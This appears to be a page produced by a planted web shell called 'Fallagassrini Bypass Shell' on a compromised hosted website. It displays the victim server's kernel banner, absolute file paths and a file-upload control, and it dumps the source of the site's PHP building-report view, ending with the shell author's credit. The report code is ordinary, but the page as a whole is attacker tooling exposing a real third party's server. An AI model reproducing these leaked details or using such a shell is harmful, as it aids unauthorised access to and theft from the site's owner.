? Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home1/savoy/public_html/savoyglobal.net/rms/application/views/report/

Linux gator3171.hostgator.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Upload File :
Current File : /home1/savoy/public_html/savoyglobal.net/rms/application/views/report/view_building_report.php

<?php
if (!defined('BASEPATH'))
    exit('No direct script access allowed');
$this->load->view('documentreadyfunctions');
?>


<div id="viewmsg2" style="width: 100%;float: left;height: 25px;"></div>
<div class="icons_main">
    <div class="icons">

    </div>
    <div class="icons_caption">
        <h4>Building Report</h4>
    </div>
</div>
<?php
$location = $this->mastermodel->getdatas('location', 'location_id', 'asc', 'location_id');
$status = $this->mastermodel->getenumvalues('customer', 'customer_status');
$attributes = array('id' => 'validateform', 'class' => 'validate');
echo form_open('report/generate_report/get_customer_report/xls_customer_report', $attributes);
?>
<div class="clean"></div> 

<div class="grid_12">
    <div class="box">
        <div class="header main no-icon"> Building Report
            <span></span>
        </div>
        <div class="content no-padding">
            <table  class="table">
                <tr>
                    <th>Location</th>                   
                    <th>Status</th>
                </tr>
                <tr>
                    <td>
                        <select name="location" class="chzn-done " id="location">
                            <option value="">--Select--</option>
                            <?php
                            foreach ($location as $list) {
                                ?>
                                <option value="<?= $list['location_id'] ?>"><?= $list['location_name'] ?></option>
                                <?php
                            }
                            ?>
                        </select>              
                    </td>
                    <td>
                        <select name="status" class="chzn-done" id="status">
                            <option value="">--Select--</option>
                            <?php
                            foreach ($status['val'] as $row) {
                                ?>                            
                                <option value="<?= $row ?>"><?= $row ?></option>  
                                <?php
                            }
                            ?>                          
                        </select> 
                    </td>
                </tr>
            </table>                                           
        </div>
        <div class="actions">
            <div class="actions-left">
                <input type="reset">
            </div>
            <div class="actions-right">
                <button style="margin-left: 130px;" type="submit" id="submit" class="clickimage"  >Generate</button>
            </div>
        </div>  
    </div>
</div>
<?php echo form_close(); ?>
<div id="loadresult"></div>
<div style="display: none">
    <div id="color"></div>
</div>

<?php

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net